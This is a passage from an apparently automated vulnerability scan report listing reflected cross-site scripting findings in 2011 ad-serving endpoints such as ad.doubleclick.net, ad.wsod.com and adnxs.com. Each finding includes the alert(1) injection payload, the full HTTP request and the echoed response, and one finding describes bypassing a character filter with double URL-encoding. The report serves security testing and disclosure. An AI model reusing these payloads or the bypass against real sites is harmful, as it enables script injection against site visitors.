User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1289

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index26096'-alert(1)-'66ba3d012db;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6814682?">
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6665e'%3balert(1)//5533bfaa5b9 was submitted in the kw parameter. This input was echoed as 6665e';alert(1)//5533bfaa5b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.homepage/local;kw=6665e'%3balert(1)//5533bfaa5b9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 468
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:30:04 GMT
Expires: Sat, 09 Apr 2011 12:30:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/t;238193711;0-0;0;12662198;3454-728/90;41302796/41320583/1;;~okv=;kw=6665e';alert(1)//5533bfaa5b9;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home">
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b456d'-alert(1)-'b6a2f49202b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302352178986?&b456d'-alert(1)-'b6a2f49202b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 487

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/n;238193711;1-0;0;12662198;3454-728/90;41550499/41568286/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;;b456d'-alert(1)-'b6a2f49202b=1;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/burlington-vt">
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/ibs.pla.news/local [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.news/local

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 932ae'%3balert(1)//f0c51e288f7 was submitted in the kw parameter. This input was echoed as 932ae';alert(1)//f0c51e288f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.news/local;kw=932ae'%3balert(1)//f0c51e288f7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 468
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:30:17 GMT
Expires: Sat, 09 Apr 2011 12:30:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/u;238193711;0-0;0;12657116;3454-728/90;41302796/41320583/1;;~okv=;kw=932ae';alert(1)//f0c51e288f7;~aopt=2/2/2678/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home">
...[SNIP]...

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 323a7%2522%253balert%25281%2529%252f%252f80464a2a6d5 was submitted in the REST URL parameter 2. This input was echoed as 323a7";alert(1)//80464a2a6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357323a7%2522%253balert%25281%2529%252f%252f80464a2a6d5/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357323a7";alert(1)//80464a2a6d5/779.0.js.88x31/1302538905**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678
...[SNIP]...

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65205%2522%253balert%25281%2529%252f%252f8a3c794d307 was submitted in the REST URL parameter 3. This input was echoed as 65205";alert(1)//8a3c794d307 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x3165205%2522%253balert%25281%2529%252f%252f8a3c794d307/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x3165205";alert(1)//8a3c794d307/1302538908**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%
...[SNIP]...

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 301ef"-alert(1)-"d146c56c313 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f301ef"-alert(1)-"d146c56c313 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
click.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f301ef"-alert(1)-"d146c56c313">
...[SNIP]...

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10881"-alert(1)-"80d49f0fc0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f&10881"-alert(1)-"80d49f0fc0a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1753

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
lick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f&10881"-alert(1)-"80d49f0fc0a=1">
...[SNIP]...

1.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ac8"-alert(1)-"0ebbe4f0048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=10&ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html&f4ac8"-alert(1)-"0ebbe4f0048=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:01:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:01:39 GMT
Pragma: no-cache
Content-Length: 4410
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=728x90&anmember=541&anprice=10&f4ac8"-alert(1)-"0ebbe4f0048=1&referrer=http%3a%2f%2fwww.foxnews.com%2fpolitics%2findex.html&s=1836970&_salt=2073956677";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_d
...[SNIP]...

1.22. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b71'%3balert(1)//052d30bafe5 was submitted in the admeld_adprovider_id parameter. This input was echoed as e8b71';alert(1)//052d30bafe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78e8b71'%3balert(1)//052d30bafe5&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:26 GMT
X-Name: rtb-o05
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78e8b71';alert(1)//052d30bafe5&external_user_id=0&expiration=1302798086" alt="" />');

1.23. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23569'%3balert(1)//b87386ea441 was submitted in the admeld_callback parameter. This input was echoed as 23569';alert(1)//b87386ea441 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match23569'%3balert(1)//b87386ea441 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:26 GMT
X-Name: rtb-o03
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match23569';alert(1)//b87386ea441?admeld_adprovider_id=78&external_user_id=0&expiration=1302798086" alt="" />');

1.24. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccf36'-alert(1)-'517d783341 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193ccf36'-alert(1)-'517d783341&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:47 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ccf36'-alert(1)-'517d783341&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');

1.25. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0bd2'-alert(1)-'82d72219828 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche0bd2'-alert(1)-'82d72219828 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
